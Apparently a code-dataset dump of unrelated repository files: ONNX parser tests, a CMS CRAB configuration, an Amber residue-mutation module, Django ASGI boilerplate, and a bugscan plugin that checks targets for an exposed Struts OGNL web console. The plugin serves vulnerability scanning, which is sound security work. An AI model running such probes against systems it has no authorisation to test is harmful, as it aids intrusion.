           """
        graph = onnx.parser.parse_graph(input)
        self.check_graph(graph)

    def test_parse_model(self) -> None:
        # A model header (<...>) plus graph parses into a ModelProto and
        # the header fields survive the round trip.
        input = """
           <
             ir_version: 7,
             opset_import: [ "" : 10, "com.microsoft": 1]
           >
           agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
           {
              T = MatMul(X, W)
              S = Add(T, B)
              C = Softmax(S)
           }
           """
        model = onnx.parser.parse_model(input)
        self.assertEqual(model.ir_version, 7)
        self.assertEqual(len(model.opset_import), 2)
        self.check_graph(model.graph)

    def test_parse_graph_error(self) -> None:
        # Malformed node syntax (MatMul[X, W] instead of MatMul(X, W))
        # must raise ParseError.
        input = """
           agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
           {
              T = MatMul[X, W]
              S = Add(T, B)
              C = Softmax(S)
           }
           """
        self.assertRaises(
            onnx.parser.ParseError, lambda: onnx.parser.parse_graph(input)
        )

    def test_parse_model_error(self) -> None:
        # A missing comma in the opset_import list must raise ParseError.
        input = """
           <
             ir_version: 7,
             opset_import: [ "" : 10 "com.microsoft": 1]
           >
           agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
           {
              T = MatMul(X, W)
              S = Add(T, B)
              C = Softmax(S)
           }
           """
        self.assertRaises(
            onnx.parser.ParseError, lambda: onnx.parser.parse_model(input)
        )

    def test_parse_function_with_attributes(self) -> None:
        # A model plus a model-local function (custom_domain.Selu) with
        # attribute defaults parses and passes the checker.
        input = """
           <
             ir_version: 9,
             opset_import: [ "" : 15, "custom_domain" : 1],
             producer_name: "FunctionProtoTest",
             producer_version: "1.0",
             model_version: 1,
             doc_string: "A test model for model local functions."
           >
           agraph (float[N] x) => (float[N] out)
           {
              out = custom_domain.Selu<alpha=2.0, gamma=3.0>(x)
           }
           <
            domain: "custom_domain",
            opset_import: [ "" : 15],
            doc_string: "Test function proto"
           >
             Selu
             <alpha: float=1.67326319217681884765625, gamma: float=1.05070102214813232421875>
             (X) => (C)
             {
                constant_alpha = Constant<value_float: float=@alpha>()
                constant_gamma = Constant<value_float: float=@gamma>()
                alpha_x = CastLike(constant_alpha, X)
                gamma_x = CastLike(constant_gamma, X)
                exp_x = Exp(X)
                alpha_x_exp_x = Mul(alpha_x, exp_x)
                alpha_x_exp_x_ = Sub(alpha_x_exp_x, alpha_x)
                neg = Mul(gamma_x, alpha_x_exp_x_)
                pos = Mul(gamma_x, X)
                _zero = Constant<value_float=0.0>()
                zero = CastLike(_zero, X)
                less_eq = LessOrEqual(X, zero)
                C = Where(less_eq, neg, pos)
             }
           """
        model = onnx.parser.parse_model(input)
        checker.check_model(model)

    # Each case: (graph text, attribute overrides expected on the Selu node).
    @parameterized.expand(
        [
            (
                "agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu(x) }",
                {},
            ),
            (
                "agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu<alpha=2.0>(x) }",
                {"alpha": 2.0},
            ),
            (
                "agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu<gamma=3.0>(x) }",
                {"gamma": 3.0},
            ),
            (
                "agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu<alpha=2.0, gamma=3.0>(x) }",
                {"alpha": 2.0, "gamma": 3.0},
            ),
        ]
    )
    def test_composite_parse_function_with_attributes(
        self, graph_text: str, expected_attribute: dict
    ) -> None:
        # Build a model from separately parsed graph + function and verify
        # both the function's attribute defaults and the node's overrides.
        default_alpha = 1.67326319217681884765625
        default_gamma = 1.05070102214813232421875

        def expect_custom_node_attribute(node, attributes):
            # Every expected override appears exactly once on the node.
            for key in attributes:
                match_attr = [attr for attr in node.attribute if attr.name == key]
                assert len(match_attr) == 1
                assert match_attr[0].f == attributes[key]

        def expect_model_function_attribute(model):
            # The function declares both alpha and gamma with their defaults.
            assert len(model.functions[0].attribute_proto) == 2
            attr_proto_alpha = [
                attr_proto
                for attr_proto in model.functions[0].attribute_proto
                if attr_proto.name == "alpha"
            ]
            assert len(attr_proto_alpha) == 1 and attr_proto_alpha[0].f == default_alpha
            attr_proto_gamma = [
                attr_proto
                for attr_proto in model.functions[0].attribute_proto
                if attr_proto.name == "gamma"
            ]
            assert len(attr_proto_gamma) == 1 and attr_proto_gamma[0].f == default_gamma

        function_text = f"""
           <
            domain: "custom_domain",
            opset_import: [ "" : 15],
            doc_string: "Test function proto"
           >
             Selu
             <alpha: float={default_alpha}, gamma: float={default_gamma}>
             (X) => (C)
             {{
                constant_alpha = Constant<value_float: float=@alpha>()
                constant_gamma = Constant<value_float: float=@gamma>()
                alpha_x = CastLike(constant_alpha, X)
                gamma_x = CastLike(constant_gamma, X)
                exp_x = Exp(X)
                alpha_x_exp_x = Mul(alpha_x, exp_x)
                alpha_x_exp_x_ = Sub(alpha_x_exp_x, alpha_x)
                neg = Mul(gamma_x, alpha_x_exp_x_)
                pos = Mul(gamma_x, X)
                _zero = Constant<value_float=0.0>()
                zero = CastLike(_zero, X)
                less_eq = LessOrEqual(X, zero)
                C = Where(less_eq, neg, pos)
             }}
           """
        functions = [onnx.parser.parse_function(function_text)]
        graph = onnx.parser.parse_graph(graph_text)
        opset_imports = [
            OperatorSetIdProto(domain="", version=15),
            OperatorSetIdProto(domain="custom_domain", version=1),
        ]
        model = onnx.helper.make_model(
            graph, functions=functions, opset_imports=opset_imports
        )
        checker.check_model(model)
        expect_model_function_attribute(model)
        expect_custom_node_attribute(model.graph.node[0], expected_attribute)
if __name__ == "__main__":
    # Allow running this test module directly via the unittest runner.
    unittest.main()
| [
"[email protected]"
] | |
f4a8e3c81ba011c641b4218d7ed3cca00179f752 | e0c8662a56d89730043146ddc340e9e0b9f7de72 | /plugin/14e55cec-1596.py | 7b13f9266669dc060f05fe19bfca14b9054da31c | [] | no_license | izj007/bugscan_poc | f2ef5903b30b15c230b292a1ff2dc6cea6836940 | 4490f3c36d4033bdef380577333722deed7bc758 | refs/heads/master | 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 720 | py | #coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
"""
POC Name : OGNL console
Author : a
mail : [email protected]
Referer: http://wooyun.org/bugs/wooyun-2010-080076
"""
import urlparse
def assign(service, arg):
    # Reduce the target URL to its site root for the 'www' service.
    # Returns (True, 'scheme://host/'); any other service yields None.
    if service != 'www':
        return
    parts = urlparse.urlparse(arg)
    return True, '%s://%s/' % (parts.scheme, parts.netloc)
def audit(arg):
    # Probe for an exposed Struts OGNL web console (see referer
    # wooyun-2010-080076 in the module docstring).
    payload = '/struts/webconsole.html'
    url = arg + payload
    # The five-tuple unpacked here follows curl.curl's return convention.
    code, head, res, errcode, _ = curl.curl('"%s"' % url)
    if code == 200 and "Welcome to the OGNL console" in res:
        security_info('find ognl console:' +url)
if __name__ == '__main__':
    # Standalone run: the dummy module supplies the *_info reporting helpers.
    from dummy import *
    audit(assign('www', 'http://www.homilychart.com/')[1])
| [
"[email protected]"
] | |
8787aeb0950cc8d74bb12753045c0ae4d10b16e6 | 17c280ade4159d4d8d5a48d16ba3989470eb3f46 | /18/mc/ExoDiBosonResonances/EDBRTreeMaker/test/crab3_analysisWprime1800.py | 9e802f49450f00b24370cdff361d92b3565fac2c | [] | no_license | chengchen1993/run2_ntuple | 798ff18489ff5185dadf3d1456a4462e1dbff429 | c16c2b203c05a3eb77c769f63a0bcdf8b583708d | refs/heads/master | 2021-06-25T18:27:08.534795 | 2021-03-15T06:08:01 | 2021-03-15T06:08:01 | 212,079,804 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,082 | py | from WMCore.Configuration import Configuration
config = Configuration()
# --- General: request naming and log transfer ---
config.section_("General")
config.General.requestName = 'Wprime_1800_weight_v2'
config.General.transferLogs = True
# --- JobType: analysis plugin, JEC text files shipped with each job ---
config.section_("JobType")
config.JobType.pluginName='Analysis'
config.JobType.sendExternalFolder=True# = 'Analysis'
config.JobType.inputFiles = ['Autumn18_V19_MC_L1FastJet_AK4PFchs.txt','Autumn18_V19_MC_L2Relative_AK4PFchs.txt','Autumn18_V19_MC_L3Absolute_AK4PFchs.txt','Autumn18_V19_MC_L1FastJet_AK8PFchs.txt','Autumn18_V19_MC_L2Relative_AK8PFchs.txt','Autumn18_V19_MC_L3Absolute_AK8PFchs.txt','Autumn18_V19_MC_L1FastJet_AK8PFPuppi.txt','Autumn18_V19_MC_L2Relative_AK8PFPuppi.txt','Autumn18_V19_MC_L3Absolute_AK8PFPuppi.txt','Autumn18_V19_MC_L1FastJet_AK4PFPuppi.txt','Autumn18_V19_MC_L2Relative_AK4PFPuppi.txt','Autumn18_V19_MC_L3Absolute_AK4PFPuppi.txt']
#config.JobType.inputFiles = ['PHYS14_25_V2_All_L1FastJet_AK4PFchs.txt','PHYS14_25_V2_All_L2Relative_AK4PFchs.txt','PHYS14_25_V2_All_L3Absolute_AK4PFchs.txt','PHYS14_25_V2_All_L1FastJet_AK8PFchs.txt','PHYS14_25_V2_All_L2Relative_AK8PFchs.txt','PHYS14_25_V2_All_L3Absolute_AK8PFchs.txt']
# Name of the CMSSW configuration file
#config.JobType.psetName = 'bkg_ana.py'
config.JobType.psetName = 'analysis.py'
#config.JobType.allowUndistributedCMSSW = True
config.JobType.allowUndistributedCMSSW = True
# --- Data: input dataset and file-based splitting, no publication ---
config.section_("Data")
#config.Data.inputDataset = '/WJetsToLNu_13TeV-madgraph-pythia8-tauola/Phys14DR-PU20bx25_PHYS14_25_V1-v1/MINIAODSIM'
config.Data.inputDataset = '/WprimeToWZToWlepZhad_narrow_M-1800_13TeV-madgraph/RunIISummer16MiniAODv2-PUMoriond17_80X_mcRun2_asymptotic_2016_TrancheIV_v6-v1/MINIAODSIM'
config.Data.inputDBS = 'global'
#config.Data.inputDBS = 'phys03'
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob =10
config.Data.totalUnits = -1
config.Data.publication = False
# This string is used to construct the output dataset name
config.Data.outputDatasetTag = 'Wprime_1800_weight_v2'
config.section_("Site")
# Where the output files will be transmitted to
config.Site.storageSite = 'T2_CH_CERN'
| [
"[email protected]"
] | |
3e466dffd0b79a8e26b47596233aa19edadc61ce | 47b4d76e9c87e6c45bab38e348ae12a60a60f94c | /Mutation_Modules/GLN_ASN.py | efbed28aa20e0ca0a3e8faeedc094ac0a4d66aac | [] | no_license | PietroAronica/Parasol.py | 9bc17fd8e177e432bbc5ce4e7ee2d721341b2707 | 238abcdc2caee7bbfea6cfcdda1ca705766db204 | refs/heads/master | 2021-01-10T23:57:40.225140 | 2020-10-14T02:21:15 | 2020-10-14T02:21:15 | 70,791,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,045 | py | # GLN to ASN Mutation
import Frcmod_creator
import PDBHandler
import Leapy
from parmed.tools.actions import *
from parmed.amber.readparm import *
def parmed_command(vxi='VXI', lipid='No'):
    """For each mixing ratio 0..100 (step 10), interpolate the per-atom
    charges of residue *vxi* between the GLN (bc) and ASN (fc) end states
    and write the result back into the corresponding Solv_*.prmtop."""
    # bc: beginning-state (GLN) charges, keyed by atom name.
    bc = {}
    with open('Param_files/AminoAcid/GLN.param', 'r') as b:
        data = b.readlines()[1:]
        for line in data:
            key, value = line.split()
            bc[key] = float(value)
    # NOTE(review): redundant -- the with-block already closed the file.
    b.close()
    # fc: final-state (ASN) charges.
    fc = {}
    with open('Param_files/AminoAcid/ASN.param', 'r') as b:
        data = b.readlines()[1:]
        for line in data:
            key, value = line.split()
            fc[key] = float(value)
    b.close()
    for i in range(11):
        a = i*10
        i = float(i)
        parm = AmberParm('Solv_{}_{}.prmtop'.format(a, 100-a))
        change(parm, 'charge', ':{}@N'.format(vxi), bc['N']+((fc['N']-bc['N'])/10)*i).execute()
        change(parm, 'charge', ':{}@H'.format(vxi), bc['H']+((fc['H']-bc['H'])/10)*i).execute()
        change(parm, 'charge', ':{}@CA'.format(vxi), bc['CA']+((fc['CA']-bc['CA'])/10)*i).execute()
        change(parm, 'charge', ':{}@HA'.format(vxi), bc['HA']+((fc['HA']-bc['HA'])/10)*i).execute()
        change(parm, 'charge', ':{}@CB'.format(vxi), bc['CB']+((fc['CB']-bc['CB'])/10)*i).execute()
        # NOTE(review): HB2/HB3 are assigned here and then overwritten by
        # the decay-to-zero assignments a few lines below.  Given the CG1
        # dummy atom handled in between, the later pair may have been meant
        # for HG2/HG3 instead -- confirm before changing behaviour.
        change(parm, 'charge', ':{}@HB2'.format(vxi), bc['HB2']+((fc['HB2']-bc['HB2'])/10)*i).execute()
        change(parm, 'charge', ':{}@HB3'.format(vxi), bc['HB3']+((fc['HB3']-bc['HB3'])/10)*i).execute()
        change(parm, 'charge', ':{}@CG1'.format(vxi), bc['CG']-((bc['CG'])/10)*i).execute()
        change(parm, 'charge', ':{}@HB2'.format(vxi), bc['HB2']-((bc['HB2'])/10)*i).execute()
        change(parm, 'charge', ':{}@HB3'.format(vxi), bc['HB3']-((bc['HB3'])/10)*i).execute()
        change(parm, 'charge', ':{}@CG'.format(vxi), bc['CD']+((fc['CG']-bc['CD'])/10)*i).execute()
        change(parm, 'charge', ':{}@OD1'.format(vxi), bc['OE1']+((fc['OD1']-bc['OE1'])/10)*i).execute()
        change(parm, 'charge', ':{}@ND2'.format(vxi), bc['NE2']+((fc['ND2']-bc['NE2'])/10)*i).execute()
        change(parm, 'charge', ':{}@HD21'.format(vxi), bc['HE21']+((fc['HD21']-bc['HE21'])/10)*i).execute()
        change(parm, 'charge', ':{}@HD22'.format(vxi), bc['HE22']+((fc['HD22']-bc['HE22'])/10)*i).execute()
        change(parm, 'charge', ':{}@C'.format(vxi), bc['C']+((fc['C']-bc['C'])/10)*i).execute()
        change(parm, 'charge', ':{}@O'.format(vxi), bc['O']+((fc['O']-bc['O'])/10)*i).execute()
        #print printDetails(parm, ':VXI')
        setOverwrite(parm).execute()
        parmout(parm, 'Solv_{}_{}.prmtop'.format(a, 100-a)).execute()
def makevxi(struct, out, aa, vxi='VXI'):
    """Write *struct* to PDB file *out*, renaming residue *aa* to the
    GLN->ASN hybrid residue *vxi*.

    Side-chain atoms of the mutated residue are renamed from their GLN
    labels to the hybrid labels: CG becomes the dummy CG1, while CD, OE1,
    NE2, HE21 and HE22 become CG, OD1, ND2, HD21 and HD22.
    """
    # GLN -> hybrid atom-name translation, replacing the old if/elif chain.
    rename = {
        'CG': 'CG1',
        'CD': 'CG',
        'OE1': 'OD1',
        'NE2': 'ND2',
        'HE21': 'HD21',
        'HE22': 'HD22',
    }
    struct.residue_dict[aa].set_resname(vxi)
    # Bug fix: the output handle was never closed; use a context manager.
    with open(out, 'w') as pdb:
        try:
            pdb.write(struct.other_dict['Cryst1'].formatted())
        except KeyError:
            pass  # no CRYST1 record in the source structure
        for res in struct.residue_list:
            for atom in res.atom_list:
                if res.get_resname() == vxi and atom.get_name() in rename:
                    pdb.write(atom.change_name(rename[atom.get_name()]))
                else:
                    pdb.write(atom.formatted())
                try:
                    # Preserve a TER record following this atom, if any
                    # (narrowed from a bare except).
                    pdb.write(struct.other_dict[atom.get_number()].ter())
                except KeyError:
                    pass
        for oth in struct.other_dict:
            # Copy CONECT records through unchanged; skip non-string keys
            # (e.g. the atom numbers that map to TER records above).
            if isinstance(oth, str) and oth.startswith('Conect'):
                pdb.write(struct.other_dict[oth].formatted())
        pdb.write('END\n')
def variablemake(sym='^'):
    """Return the 15 placeholder atom-type names built from *sym*.

    The suffixes are the digits 1-9, then 0, then the letters a-e, giving
    the ^1..^9, ^0, ^a..^e names used throughout the mutation modules.
    Replaces fifteen hand-written assignments with a comprehension.
    """
    return tuple(sym + suffix for suffix in '1234567890abcde')
def lib_make(ff, outputfile, vxi='VXI', var=variablemake()):
    """Generate the tleap script that builds the hybrid-residue library.

    Writes lyp.in (source the force field, load the ASN-GLN template PDB,
    assign elements/names/types to the 17 atoms, define the bond graph and
    head/tail connections, save the .lib) and runs it through Leapy.
    """
    intcar = var[0]
    inthyd = var[1]
    # (element, atom name, amber type) for residue atoms 1..17, in order.
    atom_table = [
        ('N', 'N', 'N'),
        ('H', 'H', 'H'),
        ('C', 'CA', 'CT'),
        ('H', 'HA', 'H1'),
        ('C', 'CB', 'CT'),
        ('H', 'HB2', 'HC'),
        ('H', 'HB3', 'HC'),
        ('C', 'CG1', intcar),
        ('H', 'HG2', inthyd),
        ('H', 'HG3', inthyd),
        ('C', 'CG', 'C'),
        ('O', 'OD1', 'O'),
        ('N', 'ND2', 'N'),
        ('H', 'HD21', 'H'),
        ('H', 'HD22', 'H'),
        ('C', 'C', 'C'),
        ('O', 'O', 'O'),
    ]
    # Bond graph over the 1-based indices of atom_table.
    bond_pairs = [
        (1, 2), (1, 3), (3, 4), (3, 5), (3, 16), (5, 6), (5, 7), (5, 8),
        (8, 9), (8, 10), (8, 11), (11, 12), (11, 13), (13, 14), (13, 15),
        (16, 17),
    ]
    with open('lyp.in', 'w') as ctrl:
        ctrl.write("source %s\n" % ff)
        ctrl.write("%s=loadpdb Param_files/LibPDB/ASN-GLN.pdb\n" % vxi)
        for idx, (element, _, _) in enumerate(atom_table, 1):
            ctrl.write('set %s.1.%d element "%s"\n' % (vxi, idx, element))
        for idx, (_, name, _) in enumerate(atom_table, 1):
            ctrl.write('set %s.1.%d name "%s"\n' % (vxi, idx, name))
        for idx, (_, _, atype) in enumerate(atom_table, 1):
            ctrl.write('set %s.1.%d type "%s"\n' % (vxi, idx, atype))
        for left, right in bond_pairs:
            ctrl.write('bond %s.1.%d %s.1.%d\n' % (vxi, left, vxi, right))
        ctrl.write('set %s.1 connect0 %s.1.N\n' % (vxi, vxi))
        ctrl.write('set %s.1 connect1 %s.1.C\n' % (vxi, vxi))
        ctrl.write('set %s name "%s"\n' % (vxi, vxi))
        ctrl.write('set %s.1 name "%s"\n' % (vxi, vxi))
        ctrl.write('set %s head %s.1.N\n' % (vxi, vxi))
        ctrl.write('set %s tail %s.1.C\n' % (vxi, vxi))
        ctrl.write('saveoff %s %s.lib\n' % (vxi, vxi))
        ctrl.write("quit\n")
    Leapy.run('lyp.in', outputfile)
def all_make():
    """Create the eleven mixed frcmod files (0_100, 10_90, ..., 100_0)."""
    for weight in range(0, 101, 10):
        Frcmod_creator.make('{}_{}.frcmod'.format(weight, 100 - weight))
def cal(x, y, i):
    """Interpolate from *x* toward *y* in ten equal steps; return step *i*."""
    step = (y - x) / 10
    return x + step * i
def lac(y, x, i):
    """Interpolate from *x* toward *y* in ten equal steps (argument order
    reversed with respect to cal); return step *i*."""
    step = (y - x) / 10
    return x + step * i
def stock_add_to_all(var=variablemake()):
    """Fill every mixed frcmod file with interpolated force-field terms.

    For each mixing ratio 0..100 (step 10), the masses, bonds, angles,
    dihedrals and non-bonded parameters involving the intermediate carbon
    (intcar) and hydrogen (inthyd) types are written as linear
    interpolations (via lac) between the stock end-state parameter sets.
    """
    intcar = var[0]
    inthyd = var[1]
    Frcmod_creator.make_hyb()
    Frcmod_creator.TYPE_insert(intcar, 'C', 'sp3')
    Frcmod_creator.TYPE_insert(inthyd, 'H', 'sp3')
    # Parse the stock table: first token per line is the key, the remaining
    # tokens are float parameter columns.
    p = {}
    with open('Param_files/Stock/Stock.param', 'r') as b:
        data = b.readlines()[1:]
        for line in data:
            p[line.split()[0]] = []
            for point in line.split()[1:]:
                p[line.split()[0]].append(float(point))
    # NOTE(review): redundant -- the with-block already closed the file.
    b.close()
    for i in range(11):
        a = i*10
        # Masses, then bonds, angles, dihedrals and non-bonded terms for the
        # a/(100-a) mixture file; each value interpolates between end states.
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), intcar, lac(p['0_C'][0], p['CT'][0], i), lac(p['0_C'][1], p['CT'][1], i))
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), inthyd, lac(p['0_H'][0], p['HC'][0], i), lac(p['0_H'][1], p['HC'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', intcar), lac(p['CT_mC'][0], p['CT_CT'][0], i), lac(p['CT_mC'][1], p['CT_CT'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format(intcar, 'C '), lac(p['C_mC'][0], p['CT_C'][0], i), lac(p['C_mC'][1], p['CT_C'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format(intcar, inthyd), lac(p['HC_mC'][0], p['CT_HC'][0], i), lac(p['HC_mC'][1], p['CT_HC'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(inthyd, intcar, inthyd), lac(p['Close'][0], p['H_C_H'][0], i), lac(p['Close'][1], p['H_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', intcar, inthyd), lac(p['Dritt'][0], p['C_C_H'][0], i), lac(p['Dritt'][1], p['C_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(inthyd, intcar, 'C '), lac(p['Close'][0], p['C_C_H'][0], i), lac(p['Close'][1], p['C_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', intcar, 'C '), lac(p['Dritt'][0], p['CT_CT_C'][0], i), lac(p['Dritt'][1], p['CT_CT_C'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', intcar), lac(p['C_C_C'][0], p['C_C_C'][0], i), lac(p['C_C_C'][1], p['C_C_C'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('HC', 'CT', intcar), lac(p['C_C_H'][0], p['C_C_H'][0], i), lac(p['C_C_H'][1], p['C_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(intcar, 'C ', 'O '), lac(p['C_C_O'][0], p['C_C_O'][0], i), lac(p['C_C_O'][1], p['C_C_O'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(intcar, 'C ', 'N '), lac(p['C_C_N'][0], p['C_C_N'][0], i), lac(p['C_C_N'][1], p['C_C_N'][1], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(inthyd, intcar, 'C ', 'O '), lac(p['0_10'][0], p['H_C_C_O_1'][0], i), lac(p['0_10'][1], p['H_C_C_O_1'][1], i), lac(p['0_10'][2], p['H_C_C_O_1'][2], i), lac(p['0_10'][3], p['H_C_C_O_1'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(inthyd, intcar, 'C ', 'O '), lac(p['0_8'][0], p['H_C_C_O_2'][0], i), lac(p['0_8'][1], p['H_C_C_O_2'][1], i), lac(p['0_8'][2], p['H_C_C_O_2'][2], i), lac(p['0_8'][3], p['H_C_C_O_2'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(inthyd, intcar, 'C ', 'O '), lac(p['0_9'][0], p['H_C_C_O_3'][0], i), lac(p['0_9'][1], p['H_C_C_O_3'][1], i), lac(p['0_9'][2], p['H_C_C_O_3'][2], i), lac(p['0_9'][3], p['H_C_C_O_3'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('HC', 'CT', intcar, inthyd), lac(p['0_1'][0], p['H_C_C_H'][0], i), lac(p['0_1'][1], p['H_C_C_H'][1], i), lac(p['0_1'][2], p['H_C_C_H'][2], i), lac(p['0_1'][3], p['H_C_C_H'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', 'CT', intcar, inthyd), lac(p['0_1'][0], p['C_C_C_H'][0], i), lac(p['0_1'][1], p['C_C_C_H'][1], i), lac(p['0_1'][2], p['C_C_C_H'][2], i), lac(p['0_1'][3], p['C_C_C_H'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('HC', 'CT', intcar, 'C '), lac(p['0_4'][0], p['X_C_C_X'][0], i), lac(p['0_4'][1], p['X_C_C_X'][1], i), lac(p['0_4'][2], p['X_C_C_X'][2], i), lac(p['0_4'][3], p['X_C_C_X'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', 'CT', intcar, 'C '), lac(p['0_4'][0], p['X_C_C_X'][0], i), lac(p['0_4'][1], p['X_C_C_X'][1], i), lac(p['0_4'][2], p['X_C_C_X'][2], i), lac(p['0_4'][3], p['X_C_C_X'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', intcar, 'C ', 'O '), lac(p['Ring_Dihe_2'][0], p['Ring_Dihe_2'][0], i), lac(p['Ring_Dihe_2'][1], p['Ring_Dihe_2'][1], i), lac(p['Ring_Dihe_2'][2], p['Ring_Dihe_2'][2], i), lac(p['Ring_Dihe_2'][3], p['Ring_Dihe_2'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', intcar, 'C ', 'N '), lac(p['0_3'][0], p['C_C_C_N_1'][0], i), lac(p['0_3'][1], p['C_C_C_N_1'][1], i), lac(p['0_3'][2], p['C_C_C_N_1'][2], i), lac(p['0_3'][3], p['C_C_C_N_1'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', intcar, 'C ', 'N '), lac(p['0_8'][0], p['C_C_C_N_2'][0], i), lac(p['0_8'][1], p['C_C_C_N_2'][1], i), lac(p['0_8'][2], p['C_C_C_N_2'][2], i), lac(p['0_8'][3], p['C_C_C_N_2'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', intcar, 'C ', 'N '), lac(p['0_2'][0], p['C_C_C_N_3'][0], i), lac(p['0_2'][1], p['C_C_C_N_3'][1], i), lac(p['0_2'][2], p['C_C_C_N_3'][2], i), lac(p['0_2'][3], p['C_C_C_N_3'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', intcar, 'C ', 'N '), lac(p['0_7'][0], p['C_C_C_N_4'][0], i), lac(p['0_7'][1], p['C_C_C_N_4'][1], i), lac(p['0_7'][2], p['C_C_C_N_4'][2], i), lac(p['0_7'][3], p['C_C_C_N_4'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(inthyd, intcar, 'C ', 'N '), lac(p['Ring_Dihe_2'][0], p['Ring_Dihe_2'][0], i), lac(p['Ring_Dihe_2'][1], p['Ring_Dihe_2'][1], i), lac(p['Ring_Dihe_2'][2], p['Ring_Dihe_2'][2], i), lac(p['Ring_Dihe_2'][3], p['Ring_Dihe_2'][3], i))
        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), intcar, lac(p['0_C'][2], p['CT'][2], i), lac(p['0_C'][3], p['CT'][3], i))
        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), inthyd, lac(p['0_H'][2], p['HC'][2], i), lac(p['0_H'][3], p['HC'][3], i))
| [
"[email protected]"
] | |
76c6d426ea19c82ba2d57cfb8810ec4fedfbf1d8 | f03f7f4cad663f4687b8b87ea9a001cd7a0c6b31 | /rule_engine/asgi.py | 626b087bf951a5d79ee0f8275ef1dc902482b7ec | [] | no_license | amarbabuk/rule-engine | 79f05a2338539a8791aaea3a0432e4b8a1a7d1d3 | 9b7a504501d2db02178e4bbeac0409dfd0ba4833 | refs/heads/master | 2023-05-03T20:40:01.259232 | 2021-05-15T21:24:18 | 2021-05-15T21:24:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | """
ASGI config for rule_engine project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'rule_engine.settings')
application = get_asgi_application()
| [
"[email protected]"
] | |
669563710a76da0b0965af59920ba5fa960381db | a1f009fbc7700cd17fffcd97518bda1593064e33 | /source_code/python/python_advanced/strings/bytes.py | b6ee415eaff9935b7df255dd1b656f9772eacbb5 | [] | no_license | Alrin12/ComputerScienceSchool | 2db06f9d198f67ad587535b3cab0dabd8a4b8e5c | 7543ae686394fc573f80bf680ae4371a2871dede | refs/heads/master | 2021-01-23T15:04:22.672139 | 2017-07-17T15:32:31 | 2017-07-17T15:32:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | b = b"abcde"
#print(b)
#print(b.upper())
#print(b.startswith(b"ab"))
#bytes -> string
string = b.decode('UTF-8')
print(string)
| [
"[email protected]"
] | |
